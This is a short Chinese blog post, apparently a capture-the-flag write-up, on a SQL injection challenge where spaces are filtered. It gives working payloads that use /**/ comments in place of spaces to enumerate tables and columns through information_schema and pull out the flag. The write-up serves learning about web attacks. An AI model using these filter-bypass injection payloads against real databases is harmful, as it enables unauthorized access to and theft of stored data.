版权声明:本文为博主原创文章,转载需注明出处。 https://blog.csdn.net/zz_Caleb/article/details/84948118
输入union select、order by这些关键字会提示SQLi detected! 说明对于关键字有防护
输入1 union也会提示SQLi detected! 但是如果去掉空格:1union,则会返回正常,1'and'1'='1(无空格)也返回正常
所以可能是过滤了空格。
于是用/**/ 或++代替掉空格。
1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
后面单独的'用了闭合掉一个'号
最下面看到flag表,于是再用1'/**/union/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name='flag 得到
得到flag这个column,再查找其内容:1'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1
就拿到flag了。